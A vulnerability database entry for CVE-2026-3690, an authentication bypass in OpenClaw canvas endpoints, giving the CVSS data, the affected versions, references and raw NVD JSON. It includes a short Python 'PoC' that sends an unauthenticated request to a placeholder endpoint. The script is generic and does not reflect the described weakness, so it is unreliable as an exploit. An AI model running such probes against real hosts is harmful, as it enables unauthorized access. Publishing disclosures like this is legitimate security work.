Security Vulnerability Report
CVE-2026-3690 CVSS 7.4 HIGH

CVE-2026-3690

Published: 2026-04-11 01:16:16
Last Modified: 2026-04-27 17:09:56

Description

OpenClaw Canvas Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of OpenClaw. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the authentication function for canvas endpoints. The issue results from improper implementation of authentication. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-29311.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw (for the specific affected versions, refer to the official security advisory GHSA-vvjh-f6p9-5vcf)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-3690 PoC: OpenClaw Canvas Authentication Bypass

# Target configuration
target_url = "http://target-ip:port/canvas/api/endpoint"


def exploit():
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-3690-Scanner)",
        "Content-Type": "application/json",
    }
    print(f"[*] Attempting to bypass authentication on {target_url}...")
    try:
        # Sending request without authentication cookies/tokens
        response = requests.get(target_url, headers=headers, timeout=10)
        # Check if the request was successful (HTTP 200 OK)
        if response.status_code == 200:
            print("[+] Authentication bypass successful!")
            print(f"[+] Response data: {response.text[:200]}")
        else:
            print(f"[-] Failed to bypass. Status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error occurred: {e}")


if __name__ == "__main__":
    exploit()

References

https://github.com/openclaw/openclaw/security/advisories/GHSA-vvjh-f6p9-5vcf (Third Party Advisory, Exploit)
https://www.zerodayinitiative.com/advisories/ZDI-26-228/ (Third Party Advisory, Exploit)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3690", "sourceIdentifier": "[email protected]", "published": "2026-04-11T01:16:15.990", "lastModified": "2026-04-27T17:09:55.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw Canvas Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of OpenClaw. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the the authentication function for canvas endpoints. The issue results from improper implementation of authentication. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-29311."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-291"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.19", "matchCriteriaId": "539A1AE2-E6EC-4FC0-A794-28AA37D76D8E"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vvjh-f6p9-5vcf", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-228/", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}